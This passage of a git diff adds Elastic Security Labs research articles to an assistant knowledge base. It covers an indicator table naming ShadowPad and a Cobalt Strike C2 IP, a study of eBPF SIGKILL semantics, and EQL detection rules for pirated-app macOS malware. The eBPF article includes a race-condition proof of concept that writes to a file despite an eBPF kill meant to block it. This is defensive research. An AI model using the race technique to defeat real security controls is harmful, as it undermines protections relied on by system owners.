+| 54f969ce5c4be11df293db600df57debcb0bf27ecad38ba60d0e44d4439c39b6 | SHA-256 | kk2.exe                                 | mhyprot.sys loader                                        |
+| 509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6 | SHA-256 | mhyprot.sys                             | vulnerable driver                                         |
+| 386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd | SHA-256 | 13802 AR.exeBDReinit.exe                | vulnerable Bitdefender Crash Handler                      |
+| 452b08d6d2aa673fb6ccc4af6cebdcb12b5df8722f4d70d1c3491479e7b39c05 | SHA-256 | log.dll                                 | SHADOWPAD                                                 |
+| 5be0045a2c86c38714ada4084080210ced8bc5b6865aef1cca658b263ff696dc | SHA-256 | APerfectDayBase.dll                     | malicious DLL injected into vulnerable binaries           |
+| 3f5377590689bd19c8dd0a9d46f30856c90d4ee1c03a68385973188b44cc9ab7 | SHA-256 | AlarmClock.exe                          | benign, but targeted for side-loading APerfectDayBase.dll |
+| f2a9ee6dd4d1ceb4d97138755c919549549311c06859f236fc8655cf38fe5653 | SHA-256 | Loader.any                              | currently unknown DLL                                     |
+| 3b41c46824b78263d11b1c8d39cfe8c0e140f27c20612d954b133ffb110d206a | SHA-256 | Loader.any                              | currently unknown DLL                                     |
+| 9b66cd1a80727882cfa1303ada37019086c882c9543b3f957ee3906440dc8276 | SHA-256 | Class1.exe                              | currently unknown file                                    |
+| 185.239.70.229                                                   | ipv4    | na                                      | Cobalt Strike C2                                          |
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/signaling_from_within_how_ebpf_interacts_with_signals.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/signaling_from_within_how_ebpf_interacts_with_signals.md
new file mode 100644
index 0000000000000..00fb3521465fa
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/signaling_from_within_how_ebpf_interacts_with_signals.md
@@ -0,0 +1,287 @@
+---
+title: "Signaling from within: how eBPF interacts with signals"
+slug: "signaling-from-within-how-ebpf-interacts-with-signals"
+date: "2023-11-28"
+description: "This article explores some of the semantics of UNIX signals when generated from an eBPF program."
+author:
+  - slug: christiano-haesbaert
+image: "photo-edited-09@2x.jpg"
+category:
+  - slug: security-research
+---
+
+## Background
+
+Signals have been around since the UNIX First Edition in 1971 and while its semantics and system calls suffered changes throughout the years, its uses and application have remained largely the same. Usually, when we talk about signal semantics, we're talking about what userland can observe and interact with. After all, we mostly generate and handle signals to/from userland processes.
+
+In this publication, we will explore some of the semantics from signals generated _inside_ the kernel within an eBPF program. More so, we’ll identify what kind of effects and guarantees we observed after the handling of such signals. You can find more information about eBPF [in this article](https://www.elastic.co/blog/ebpf-observability-security-workload-profiling).
+
+## Motivation
+
+In [Elastic Defend for Containers](https://docs.elastic.co/integrations/cloud_defend) we utilize eBPF in Linux Security Module ([LSM](https://www.kernel.org/doc/html/v4.16/admin-guide/LSM/index.html)) hooks that restrict access to system resources. Using LSM is the preferred way to conduct this kind of restriction as the eBPF program can return an error like [EPERM (an operation was attempted, but without proper privileges)](https://pubs.opengroup.org/onlinepubs/9699919799/functions/V2_chap02.html#tag_15_03), which is propagated up to the system call return value.
+
+The problem with using eBPF+LSM in this way is that support is relatively new and only applies to AMD64 for the most part. Therefore, we wanted to explore using the eBPF helper [`bpf_send_signal`()](https://man7.org/linux/man-pages/man7/bpf-helpers.7.html) where necessary, like older kernels or different architectures. Instead of failing the system call with EPERM, `bpf_send_signal()` would be used to send a `SIGKILL` to the current process and terminate it, arguably more dramatic but still reasonable given the limitations.
+
+Generally, we aim to answer these questions:
+ - What side effects are observed (if any) after the program receives a `SIGKILL`
+ - Which of the side effects (if any) result from the signal subsystem design versus the implementation
+ - If the kernel code shifts in the future, how will that impact these side effects
+ 
+## Scenario: blocking openat(2)
+
+Imagine we would like to prevent certain processes from opening files and, for the sake of simplicity, we would like to prevent these processes from using an [`openat(2)`](https://linux.die.net/man/2/openat) system call.
+
+If LSM were available, we would hook our eBPF program in the LSM hook [`security_file_open()`](https://elixir.bootlin.com/linux/v6.5.10/source/fs/open.c#L901), return EPERM, and then `openat(2)` would fail gracefully. Because LSM is not available, we’ll instead generate a `SIGKILL`, but first, we need to figure out a place to hook our eBPF program in the kernel. 
+
+We have options: use a static tracepoint like syscalls:sys_enter_openat2 or we can use [kprobes](https://docs.kernel.org/trace/kprobes.html) and run our eBPF program from a kernel function of our choice. Obvious candidates would be [`vfs_open`](https://elixir.bootlin.com/linux/v6.5.10/source/fs/open.c#L1045), [`do_sys_openat2`](https://elixir.bootlin.com/linux/v6.5.10/source/fs/open.c#L1045) (happens a little earlier), or [`__x64_sys_openat`](https://elixir.bootlin.com/linux/v6.5.10/source/fs/open.c#L1441) (even earlier, but machine-dependent). We can test it with bpftrace:
+
+```
+bpftrace --unsafe -e 
+ 'kprobe:vfs_open /str(((struct path *)arg0)->dentry->d_name.name) == "__noopen"/ 
+ { signal("SIGKILL") }'
+
+# In another tty we can put it to the test
+$ strace /bin/cat /tmp/__noopen
+...
+openat(AT_FDCWD, "/tmp/__noopen", O_RDONLY) = ?
++++ killed by SIGKILL +++
+Killed
+```
+
+We can see that `cat(1)` is terminated with `SIGKILL` the moment it attempts to open the file.  At first glance, this appears to work correctly, but it may be premature to declare victory.
+
+It's important to note that the signal is not being generated by an external process but from the context of the `cat(1)` process doing the system call to itself. It is performing the equivalent of `kill(0, SIGKILL)` from within the kernel, where 0 means “self”.
+
+The only thing we’ve proven is that the program is indeed terminated, but this opens more questions:
+ - Did we block `openat(2)` or not?
+  - Does the outcome change If we successfully block `openat(2)`?
+  - Are there more observable side effects?
+
+If we conduct the same experiment, on the same path but with a nonexistent file, and pass the `O_CREAT` flag to `openat(2)`, is the file created? Is the application still terminated? Let’s see what happens:
+
+```
+$ rm /tmp/__noopen 
+$ strace /bin/touch /tmp/__noopen
+...
+openat(AT_FDCWD, "/tmp/__noopen", O_WRONLY|O_CREAT|O_NOCTTY|O_NONBLOCK, 0666) = ?
++++ killed by SIGKILL +++
+Killed
+```
+
+In this case, we are still terminated by `SIGKILL`. But, if we examine the filesystem, there is now an empty file created by the offending program! We can conclude that `openat(2)`  did somehow execute because the file creation was observed.
+
+## Kernel handling of a SIGKILL
+
+Signals can’t be handled online; instead, they must be post-processed at safe points. By online we mean: If I'm doing a system call, and a SIGKILL arrives, I cannot just cease to exist. Signals must be checked at safe points, and in most UNIXes this is done before returning to userland.
+
+The check for signal pending is done after running the system call at [`exit_to_user_mode_loop()`](https://elixir.bootlin.com/linux/v6.5.10/source/kernel/entry/common.c#L147). If `TIG_SIGPENDING` is set in the current task structure, the process branches into the signal handling code. When `SIGKILL` (a fatal signal) is pending, the process branches into [`do_group_exit()`](https://elixir.bootlin.com/linux/v6.5.10/source/kernel/exit.c#L999) which never returns, resulting in the end of the process.
+
+![](/assets/images/signaling-from-within-how-ebpf-interacts-with-signals/image1.png)
+
+## Why post-process signals
+
+Signals must be post-processed and handled at safe points, otherwise the kernel would have to account for the process involuntarily exiting due to a fatal signal. We can conduct a thought experiment and imagine an implementation that attempts to process signals the moment they arrive. This could be implemented by interrupting the running process and forcing it to exit from the interrupt context, for example:
+ - Process A running on `cpu0` performs a system call
+ - Process B running on `cpu1` sends a `SIGKILL` to process A
+ - An IPI would be sent from `cpu1` to `cpu0`
+ - `cpu0` would trap into an interrupt frame, realize it is here due to a signal being sent, and perform an exit of the current process
+ 
+![](/assets/images/signaling-from-within-how-ebpf-interacts-with-signals/image2.png)
+
+Thankfully this is not the case, you cannot exit from an interrupt context – furthermore, this couldn’t be implemented without introducing significant changes to resource management. When a process exits, it must release any resources – like locks, reference counts, or any other kind of mutable data that may be influenced by the exiting process.
+
+We can trace a parallel with [kernel preemption](https://wiki.linuxfoundation.org/realtime/documentation/technical_basics/preemption_models), as Linux is highly preemptive when configured with `CONFIG_PREEMPT_FULL`. This allows the scheduler to shelve the running process while it is in [kernel space](https://www.linfo.org/kernel_space.html) and run other processes. From the point of view of the process being preempted, this is an involuntary context switch as it did not voluntarily release the CPU. This is orthogonal from a preemptive userland where the scheduler preempts a running process running in user mode. Historically, UNIX systems did not employ a preemptive kernel, the strategy to maintain low latency relied solely on fast(short) system calls and [interrupt priorities](https://en.wikipedia.org/wiki/Spl_(Unix)).
+
+Programming with preemption is harder because the kernel programmer must always consider the impact of being preempted and judge when to disable preemption. Failure to disable preemption at the right time, for example on [spinlocks](https://docs.kernel.org/locking/spinlocks.html), could result in another process spinning on a lock of a preempted process indefinitely.
+
+If we allowed a process to exit involuntarily from a trap frame, it would be a bit like preemption, but much harder – if not impossible. The kernel programmer would now have to always consider "what happens if my process involuntarily exits here?", and this would likely involve having to register callbacks to release resources on exit.
+
+Hopefully, it's now clear why signals can’t be handled online. Signals in Linux, like other systems, are processed just before returning to userland.
+
+## Posting a SIGKILL from eBPF
+
+Let us follow the lifecycle of a `SIGKILL` originating from an eBPF program until the process is terminated.
+
+When an eBPF program calls the special helper [`bpf_send_signal(SIGKILL)`](https://elixir.bootlin.com/linux/v6.5.10/source/kernel/trace/bpf_trace.c#L873) we end up in [`bpf_send_signal_common(SIGKILL, PIDTYPE_TGID)`](https://elixir.bootlin.com/linux/v6.5.10/source/kernel/trace/bpf_trace.c#L831). `PIDTYPE_TGID` is the "task group id" and it specifies that any task (meaning any pthread) of the current process may accept the signal. But eBPF also provides `bpf_send_signal_task()` which sends the signal only to the current task by specifying `PIDTYPE_PID` instead.
+
+`bpf_send_signal_common()` has to be used with caution because it must be able to generate a signal from any point in the kernel where you can attach an eBPF program; which is tricky work that has resulted in some past bugs like [this deadlock](https://github.com/torvalds/linux/commit/1bc7896e9ef44fd77858b3ef0b8a6840be3a4494). This is an interesting imposition created by eBPF; before it, signals generated from the kernel were done so in controlled points.
+
+Most of the heavy lifting of posting a signal is done in [`__send_signal_locked()`](https://elixir.bootlin.com/linux/v6.5.10/source/kernel/signal.c#L1083) and [`complete_signal()`](https://elixir.bootlin.com/linux/v6.5.10/source/kernel/signal.c#L1003) and we get there through the following stack:
+
+```
+complete_signal()          ^
+__send_signal_locked()     |
+send_signal_locked()       |
+do_send_sig_info()         |
+group_send_sig_info()      |
+bpf_send_signal()          |
+
+
+static int __send_signal_locked(int sig, 
+    struct kernel_siginfo *info, struct task_struct *t, 
+    enum pid_type type, bool force)
+```
+
+In our case, in `__send_signal_locked`: `sig` is `SIGKILL`, `info` is `SEND_SIG_PRIV`, `t` is the current task (the running thread), `type` is `PIDTYPE_TGID` and `force` is true, which is always set when `info` is `SEND_SIG_PRIV`, this means this is a signal originating from the kernel, not from some userland program.
+
+`__send_signal_locked(`) will register a `SIGKILL` as [pending inside a structure of the current task](https://elixir.bootlin.com/linux/v6.5.10/source/kernel/signal.c#L1178) (our `t`), which is a process-wide structure shared by all tasks (pthreads) in this process (since we're using `PIDTYPE_TGID`),  and control is then passed to `complete_signal()`.
+
+`SIGKILL` is a bit special in `complete_signal()` as it is a fatal signal, the pending signal bit that was set in the shared structure of the process will then be [replicated](https://elixir.bootlin.com/linux/v6.5.10/source/kernel/signal.c#L1065) to a per-task pending set. This means a `SIGKILL` is marked as pending for every pthread of the current process.
+
+`complete_signal()` then wakes up all threads via [`signal_wake_up+signal_wake_up_state()`](https://elixir.bootlin.com/linux/v6.5.10/source/kernel/signal.c#L768) so that they can be terminated. Each thread must terminate on its own and send a signal politely asking the thread to “please exit next time instead of returning to userland”.
+
+In the `signal_wake_up()` stack, a flag `TIG_SIGPENDING` [will be set](https://elixir.bootlin.com/linux/v6.5.10/source/kernel/signal.c#L772), warning the task to check its pending signals. It might be that the thread is in userland at the time we try to wake it up, even worse it might be infinitely looping. In that case, it would not enter the kernel until the scheduler decides to preempt it or an interrupt fires. This case is avoided by forcing the thread to enter the kernel via [`kick_process()`](https://elixir.bootlin.com/linux/v6.5.10/source/kernel/signal.c#L782), which sends an [IPI](https://en.wikipedia.org/wiki/Inter-processor_interrupt) to the remote CPU, forcing it to trap the process into the kernel, which will then try to return to userland, check `TIG_SIGPENDING`, find a `SIGKILL`, and terminate.
+
+## Voluntary signal checking
+
+While signals are only processed when returning to userland, checking if those signals are pending can be done anywhere. tmpfs, ext4, xfs, and many other filesystems will check if a fatal signal is pending before starting a write. If a fatal signal is pending, they will return an error to the caller, unwinding the system call stack up until the point of returning to userland, which then terminates the program as we've seen before. The voluntary check for tmpfs and ext4 write can be seen [here](https://elixir.bootlin.com/linux/v6.5.10/source/mm/filemap.c#L3918).
+
+We can now reason what happens in tmpfs if we install an eBPF program that generates a `SIGKILL` early in kernel entry: the write would not be issued, as the signal would be noticed, and the operation aborted. 
+
+Btrfs doesn't behave like other filesystems, however. It doesn't check for signals before issuing a write or read further down the IO stack. When a `SIGKILL` is received, it completes the IO operation before terminating.
+
+We cannot prevent Btrfs from being able to write by generating a `SIGKILL` from an eBPF program when the program enters the write system call. Assuming this is what we would like to do, it’s logical to consider generating a `SIGKILL` earlier on `openat(2)`: this way we terminate the program much earlier, even before it has a chance to issue a write. Unfortunately, this is also unreliable, as demonstrated in the next section.
+
+## Racing open & write operations
+
+If we generate the `SIGKILL` in `openat(2)`, it is still possible to write to a file descriptor that would be returned, at least with Btrfs. The following [bpftrace](https://opensource.com/article/19/8/introduction-bpftrace) line will install a tiny eBPF program on `vfs_open()` that will generate a `SIGKILL` and terminate any process trying to open the file named `__nowrite`.
+
+```
+bpftrace --unsafe -e 'kprobe:vfs_open /str(((struct path *)arg0)->dentry->d_name.name) == "__nowrite"/ 
+ { signal("SIGKILL") }'
+```
+
+It's still possible to race the kernel and write to the would-be file descriptor, meaning we can't rely on this mechanism to prevent the file from being modified even if we can terminate the process.
+
+It should be clear by now that the open operation happens, as discussed at the beginning of this article. A file can be created with the `O_CREAT` flag, and then the effects that occur between the open operation and process termination are observable. The important observable effect is that the process file table is [populated](https://elixir.bootlin.com/linux/v6.5.10/source/fs/open.c#L1412) just before it terminates.
+
+The process file table is a per-process in-kernel table that maps file descriptor numbers to file objects. This is where, for example, file descriptor 1 refers to a file object representing standard output, so if userland calls `write(1, "foo", strlen("foo"))`, the kernel will look for the object referenced by file descriptor 1 and call `vfs_write()` on it. The file structure has callbacks that know how to write to standard output, we say this is the backing of the file descriptor.
+
+The general idea is to guess the file descriptor number that would be returned by an open operation and attempt to write to it before the process is terminated but after the open operation takes effect.
+
+The first trick is figuring out what the file descriptor number would be, this can be done with:
+
+```
+int guessed_fd;
+
+guessed_fd = dup(0);
+close(guessed_fd);
+```
+
+When a file descriptor is created via `dup(2)`, `open(2)`, `accept(2)`, `socket(2)`, or any other system call, it is guaranteed to use the lowest available number. If we `dup` any file descriptor and close it, the next system-call-creating file descriptor will likely end up using the same index that we got from `dup(2)` earlier. This isn’t necessarily true for multithreaded programs, as another thread might create a file descriptor and invalidate our guess. It’s because of these races that `dup2(2)` exists, to allow multithreaded programs to have a race-free `dup`. Multithreading was a late addition to UNIX systems, so the old semantics of file descriptor numbering had to be preserved.
+
+This guessing is not necessary because we have a controlled environment. However, it is interesting because it could be used as the base block for an attack trying to exploit this race condition.
+
+Now that we have a target file descriptor, we can spawn a bunch of worker threads attempting to write to it!
+
+```
+/*
+ * Guess the next file descriptor open will get
+ */
+if ((fd = dup(0)) == -1)
+	err(1, "dup");
+close(fd);
+
+/*
+ * Hammer Time, spawn a bunch of threads to write at the guessed fd,
+ * they hammer it even before we open.
+ */
+while (num_workers--)
+	if (pthread_create(&t_writer, NULL, writer, &fd) == -1)
+		err(1, "pthread_create");
+
+/* Give the workers some lead time */
+msleep(10);
+
+/*
+ * This should never return, since we are supposed to be SIGKILLed.
+ * The race depends on the workers hitting the file descriptor after
+ * open(2) succeeded (after fd_install()) but before
+ * exit_to_user_mode()->do_group_exit().
+ */
+fd = open(path, O_RDWR|O_CREAT, 0660);
+errx(1, "not killed, open returned fd %d", fd);
+```
+
+The writer-worker code is as simple as you could expect:
+
+```
+void *
+writer(void *vpfd)
+{
+	ssize_t n;
+	int fd = *(int *)vpfd;
+
+	/*
+	 * We'll just hammer-write the guessed file descriptor, if we succeed
+	 * we just bail as the parent thread is about to do it anyway.
+	 */
+	while (1) {
+		n = write(fd, SECRET, strlen(SECRET));
+		/* We expect to get EBADFD mostly */
+		if (n <= 0) {
+			continue;
+		}
+		/* Hooray, the file has been written */
+		break;
+	}
+
+	return (NULL);
+}
+```
+
+The complete program is available [here](https://github.com/elastic/ebpf-sig-exp/blob/main/race-openwrite.c).
+
+Most of the time we can't trigger the race condition and the program terminates with `SIGKILL`. With enough attempts from running the program in a loop, though, we can hit the race in about a minute.
+
+```
+truncate -s0 __nowrite
+until test -s __nowrite; do ./race-openwrite __nowrite; done
+```
+
+It's worth pointing out that this behavior is **not** a kernel bug in any way and is only reproducible in Btrfs. We've failed to trigger this race condition in other filesystems like ext4, tmpfs, and xfs as these implementations explicitly check for a fatal signal pending before proceeding with the write.
+
+## Other Effects
+
+We’ve talked about open and write, and we've also checked the behavior of attempting to block the effects of other system calls by generating `SIGKILL`. In the table below, `BLOCKED` means the effect did not occur. For example, unlink did not remove the file. As you can guess,  `UNBLOCKED` means the effect did occur – unlink did remove the file. In both cases the program is always SIGKILLed, meaning our signal generation did occur.
+
+| 6.5.5-200.fc38.x86_64 | Btrfs     | tmpfs     | Ext4      |
+|-----------------------|-----------|-----------|-----------|
+| chmod(2)              | UNBLOCKED | UNBLOCKED | UNBLOCKED |
+| link(2)               | UNBLOCKED | UNBLOCKED | UNBLOCKED |
+| mknod(2)              | UNBLOCKED | UNBLOCKED | UNBLOCKED |
+| write(2)              | UNBLOCKED | BLOCKED   | BLOCKED   |
+| race-open-write       | UNBLOCKED | BLOCKED   | BLOCKED   |
+| rename(2)             | UNBLOCKED | UNBLOCKED | UNBLOCKED |
+| truncate(2)           | UNBLOCKED | UNBLOCKED | UNBLOCKED |
+| unlink(2)             | UNBLOCKED | UNBLOCKED | UNBLOCKED |
+
+| 6.1.55-75.123.amzn2023.aarch64 | XFS       |
+|--------------------------------|-----------|
+| chmod(2)                       | UNBLOCKED |
+| link(2)                        | UNBLOCKED |
+| mknod(2)                       | UNBLOCKED |
+| write(2)                       | BLOCKED   |
+| race-open-write                | BLOCKED   |
+| rename(2)                      | UNBLOCKED |
+| truncate(2)                    | UNBLOCKED |
+| unlink(2)                      | UNBLOCKED |
+
+| Instruction                       | 6.5.5-200.fc38.x86_64 | 6.1.55-75.123.amzn2023.aarch64 |
+|-----------------------|-----------------------|--------------------------------|
+| write(2) on a pipe(2) | UNBLOCKED             | UNBLOCKED                      |
+| fork(2)               | BLOCKED               | BLOCKED                        |
+
+The same behavior is observed for all the equivalent “at” system calls: `openat(2)`, `renameat(2)`...
+
+## Conclusion
+
+We’ve demonstrated some of the pitfalls of attempting to use `SIGKILL` as a security mechanism from eBPF, while there are cases where it can be used reliably, those are delicate and require a deep understanding of the environment in which they are run. The key takeaways from this article are:
+ - Signal generation from within eBPF is synchronous since it’s generated to-and-from the same process context
+ - Signals are processed in the kernel after the system call takes place
+ - Specific system calls and combinations will avoid starting an operation if a fatal signal is pending
+ - We can’t reliably prevent a `write(2)` on Btrfs, even if we kill the program before `open(2)` returns from the kernel
+
+While our research is thorough, these are delicate semantics that might depend on external factors. If you believe we’ve missed something please do not hesitate to contact us. 
+
+If you’re interested in seeing more, the programs and scripts used in this research are public and available in [this repository](https://github.com/elastic/ebpf-sig-exp/). Interested in learning more about the kernel? Check out [this deep dive](https://www.elastic.co/security-labs/peeling-back-the-curtain-with-call-stacks) on call-stacks.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/sinking_macos_pirate_ships.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/sinking_macos_pirate_ships.md
new file mode 100644
index 0000000000000..7c16fc791f937
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/sinking_macos_pirate_ships.md
@@ -0,0 +1,188 @@
+---
+title: "Sinking macOS Pirate Ships with Elastic Behavior Detections"
+slug: "sinking-macos-pirate-ships"
+date: "2024-03-15"
+description: "This research looks at a recently found macOS malware campaign using the macOS Endpoint Security Framework paired with the Elastic Agent to hunt and detect the behaviors this malware exhibits."
+author:
+  - slug: colson-wilhoit
+image: "photo-edited-01@2x.jpg"
+category:
+  - slug: attack-pattern
+tags:
+  - macOS
+---
+
+## Preamble
+
+On January 12, 2024, Malwrhunterteam, an X account that surfaces interesting malware samples, usually found via VirusTotal, released a [Tweet](https://twitter.com/malwrhunterteam/status/1745959438140297697) about a pirated macOS application that appeared to contain malicious capabilities. macOS security researcher Patrick Wardle quickly released a [write-up](https://objective-see.org/blog/blog_0x79.html) detailing the application’s malicious functionality, which included dropping second and third-stage payloads. Shortly after, the team at JAMF Threat Labs released a [blog](https://jamf.com/blog/jtl-malware-pirated-applications/) that captured several additional sibling samples that JAMF had been tracking before the Malwrhunterteam tweet, delving deep into the internals and core functionality this malware provides. If you have not read both of these great write-ups, there are a lot of helpful details and background information in these sources that will add context to the rest of this analysis.
+
+This publication will not cover the malware internals or related samples. Instead, we will look to provide practical, resilient detection and threat hunting guidance that can enable you to alert on the actions taken by this, or similarly related, malware. Signature-based detections commonly fall short of such capabilities; however, we will highlight how our behavior rules deal with this.
+
+We will be breaking down the malware's actions in each stage and analyzing how we can use the data from the macOS [Endpoint Security Framework (ESF)](https://developer.apple.com/documentation/endpointsecurity) and the Elastic Agent to build these detections. Let's dig in.
+
+![UltraEdit execution flow](/assets/images/sinking-macos-pirate-ships/image4.png "image_tooltip")
+
+
+## UltraEdit
+
+The [UltraEdit](https://www.ultraedit.com/) application (a legitimate text and hex editor) was pirated (altered and then abused to facilitate malware distribution) along with several other applications and distributed via a disk image file (`.dmg`). 
+
+Upon executing the pirated version of the application, it immediately loads a 3rd party, _unsigned_ dylib (macOS shared library) called `libConfigurer64.dylib`. This dylib acts as a dropper whose goal is to download and execute follow-on payloads. The dylib downloads and executes two hidden files:  `/private/tmp/.test` and `/Users/Shared/.fseventsd`. 
+
+Looking at the initial actions taken by the application, we can see the unsigned 3rd party dylib load takes place immediately post-execution in the Analyzer View of the Elastic Security Solution. This is an important event to focus on because it is the only non-system library loaded. 
+
+![UltraEdit Dylib Load Event](/assets/images/sinking-macos-pirate-ships/image8.png "image_tooltip")
+
+
+In version 8.11, Elastic Defend introduced a first-of-its-kind dylib load event for the macOS Elastic Agent, allowing us to capture library loads and details regarding those libraries, such as dylib signature data. With this powerful new visibility, we can quickly build an [Event Query Language (EQL)](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql.html) query that looks for unsigned dylib loads from a volume mount or the applications directory structure. 
+
+**Rule Name: Application Unsigned Dylib Load**
+```
+library where event.action == "load" and dll.path :  
+("/Volumes/*.app/Contents/*", "/Applications/*.app/Contents/*") 
+and dll.code_signature.exists == false
+```
+
+![Application Unsigned Dylib Load Detection Event](/assets/images/sinking-macos-pirate-ships/image5.png "image_tooltip")
+
+
+We can and should take this a step further to identify only untrusted or unsigned processes that are loading an unsigned library. This will reduce the amount of false positives and still accurately capture the event taking place.
+
+**Rule Name: Unsigned or Untrusted Application Unsigned Dylib Load**
+```
+library where event.action == "load" and  
+(process.code_signature.exists == false or process.code_signature.trusted == false)  
+and dll.path : ("/Volumes/*.app/Contents/*", "/Applications/*.app/Contents/*") and  
+dll.code_signature.exists == false
+```
+
+We now have a behavior-based detection that triggers on the unsigned process that loads the unsigned dylib and alerts us to its presence. 
+
+Let’s look at the additional payloads and their actions to see if we can build any additional detections.
+
+### .test
+
+The `.test` binary gets placed in the temporary directory, post download (`/private/tmp/.test`), and executed with process arguments containing a path to an SSH binary. Noted by JAMF Threat Labs, this SSH binary is not in the default location of the SSH binary on macOS, which really resides at /`usr/bin/ssh`. This command line does not correlate with any intended functionality but rather an attempt to blend in.
+
+As Patrick Wardle and JAMF stated, this binary is a macOS build of the open source, cross-platform post-exploitation agent known as [Khepri](https://github.com/geemion/Khepri) and provides full backdoor access to a target system.
+
+![Elastic Analyzer View True Process Tree](/assets/images/sinking-macos-pirate-ships/image6.png "image_tooltip")
+
+
+From a detection perspective, we could create a very specific query here that looks for hidden binaries (files prefixed with a period are hidden from the user’s view in the GUI and CLI) executing from suspicious locations that contain process arguments containing the path to the SSH binary. 
+
+The issue with creating a query like this is that, as JAMF pointed out:
+
+> one particularly interesting technique that the malware uses is replacing its command-line arguments to further blend in with the operating system.
+
+The malware updates these process arguments between samples, so while this query might detect one of the samples, they could easily change it and bypass this detection. 
+
+Instead of the process arguments, we could focus on the unsigned, hidden binary executing from a suspicious directory like `/tmp`. 
+
+**Rule Name: Untrusted or Unsigned Hidden Binary Executed from Temporary Directory**
+
+```
+process where event.type == "start" and event.action == "exec" and  
+process.executable : ("/private/tmp/*", "/tmp/*") and  
+process.name : ".*" and (process.code_signature.exists == false or  
+process.code_signature.trusted == false)
+```
+
+With the above rule, if any hidden unsigned or untrusted binaries attempt to execute from a temporary directory, we will be alerted irrespective of whether our signature or our machine learning models detect it. 
+
+![Hidden Binary Executed from Temporary Directory Detection Event Example](/assets/images/sinking-macos-pirate-ships/image1.png "image_tooltip")
+
+
+(A note on false positives: It will happen, even though it should be extremely rare, to see hidden binaries executing from a temporary directory on macOS. There are many developers on macOS that adopt poor software development practices. False positives should be reviewed case-by-case and only excluded via the rule or Elastic exclusion list if the software is business-approved and validated.)
+
+In addition to this rule, since the hidden payloads make outbound command and control network connections, we could also look for any outbound network connections from a hidden executable, as that is very suspicious activity on macOS and should warrant an alert at least. If you want to reduce the possibility of false positives, specify specific process executable directories like `/Users/Shared/` or `/tmp/` etc., or include process code signature data specifying unsigned or untrusted hidden executables. 
+
+**Rule Name: Hidden Executable Outbound Network Connection**
+
+```
+network where event.type == "start" and 
+event.action == “connection_attempted” and process.name : ".*"
+```
+
+Since this is a backdoor payload that offers a variety of functionality (upload, download, etc.), it would be prudent to create additional rules that look for some of these actions from an unsigned or untrusted, hidden binary. Since we already have a rule that would detect the hidden binary's initial execution, we will move on to the next payload.
+
+### .fseventsd
+
+`.fseventsd` was the second payload dropped by the malicious dylib at (`/Users/Shared/.fseventsd`). This payload’s purpose was to provide a persistent foothold on the victim’s machine utilizing a masqueraded launch agent and to act as a downloader for another payload that has yet to be found. Still, we know from reverse engineering of `.fseventsd` is named (`.fseventsds`).
+
+We can see via the Elastic Analyzer View the first notable event is the persistence installation of a masqueraded launch agent. 
+
+![Elastic Analyzer View Process Dylib Load](/assets/images/sinking-macos-pirate-ships/image9.png "image_tooltip")
+
+
+This activity can be tackled from two different angles. We could first detect this by looking for the masqueraded `.plist` file utilizing file events and process code signature data. In the below behavior rule, we look for files where the file name starts with `com.apple…` and the file path is a `Library/LaunchAgent` or `Library/LaunchDaemon`, and the responsible process is unsigned or untrusted. 
+
+**Rule Name: Persistence via a Masqueraded Plist Filename**
+
+```
+file where event.type != "deletion" and 
+ file.name : "*com.apple*.plist" and
+ file.path :
+       ("/System/Library/LaunchAgents/*", 
+        "/Library/LaunchAgents/*",
+        "/Users/*/Library/LaunchAgents/*",
+        "/System/Library/LaunchDaemons/*",
+        "/Library/LaunchDaemons/*") and
+(process.code_signature.trusted == false or  
+process.code_signature.exists == false)
+```
+
+![Persistence via a Masqueraded Plist Filename Detection Event](/assets/images/sinking-macos-pirate-ships/image2.png "image_tooltip")
+
+
+The second way we can detect this persistent install technique is to take advantage of another new data source unique to Elastic Agent, which my colleague Ricardo Ungureanu and I added to version 8.6 of Elastic Defend. We created an aptly named persistence event that monitors the launch services directories and collects the plist details, sending them back in a structured event that can be used to create rules around suspicious or malicious Launch Agents or Daemons. 
+
+In the following rule, we look for launch events where the `runatload` value is set to `true` or the `keepalive` value is set to `true`. The plist arguments contain the path to a hidden executable in the `/Users/Shared` directory. This rule could be expanded to include additional suspicious or malicious arguments that would alert you to the installation of persistence by a malicious or suspicious binary. 
+
+**Rule Name: Persistence via Suspicious Launch Agent or Launch Daemon**
+
+```
+file where event.action == "launch_daemon" and  
+(Persistence.runatload == true or Persistence.keepalive == true) and 
+  Persistence.args : "/Users/Shared/.*"
+```
+
+![Persistence via Suspicious Launch Agent or Launch Daemon Detection Event](/assets/images/sinking-macos-pirate-ships/image3.png "image_tooltip")
+
+
+The masqueraded plist could also be detected using this persistence event using the below query.
+
+```
+file where event.action == "launch_daemon" and  
+Persistence.name : "com.apple.*" and  
+(process.code_signature.exists == false or 
+process.code_signature.trusted == false)
+```
+
+The final piece here is the downloading of the missing 3rd stage payload. The hidden `.fseventsd` located in the `/Users/Shared` folder reaches out to download this new hidden payload to the `/tmp/` directory. You might remember we already created two rules (“Hidden Binary Executed from Temporary Directory” and “Hidden Executable Outbound Network Connection”) that would detect this activity. 
+
+We could add another rule to catch when a hidden executable is created in a suspicious directory. We can look for any file event where the event action is not the deletion of the file, the file name denotes a hidden file, the file contains Mach-O header bytes, and the file path is a path where the execution of a hidden file is not common. We collect file header bytes if the file is an executable, allowing us to denote executable files from other types of files not based solely on the file extension.
+
+**Rule Name: Hidden Executable Created in Unusual Directory**
+
+```
+file where event.action != "deletion" and file.name : ".*" and 
+file.Ext.header_bytes : ("cffaedfe*", "cafebabe*") and 
+file.path : ("/Users/Shared/*", "/private/tmp/*", "/tmp/*")
+```
+
+![Elastic Behavior Based Defense](/assets/images/sinking-macos-pirate-ships/image7.png "image_tooltip")
+
+
+## Summary
+
